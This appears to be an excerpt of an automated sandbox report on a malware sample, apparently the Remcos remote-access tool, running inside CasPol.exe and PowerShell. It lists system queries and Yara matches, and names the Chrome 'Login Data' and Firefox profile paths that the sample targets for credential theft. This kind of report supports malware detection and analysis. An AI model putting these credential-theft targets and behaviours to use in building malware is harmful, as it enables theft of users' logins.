                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, logs.dat.12.drBinary or memory string: [Program Manager]
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\g
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerRL\'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433E0A cpuid 12_2_00433E0A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_004470AE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004510BA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004511E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_004512EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_004513B7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,12_2_00447597
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,12_2_0040E679
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00450A7F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450CF7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450D42
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,12_2_00450DDD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00450E6A
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.powershell.exe.7205a48.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.3843532128.0000000002DBE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.0000000007165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.1784462151.00000000062FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8184, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6832, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
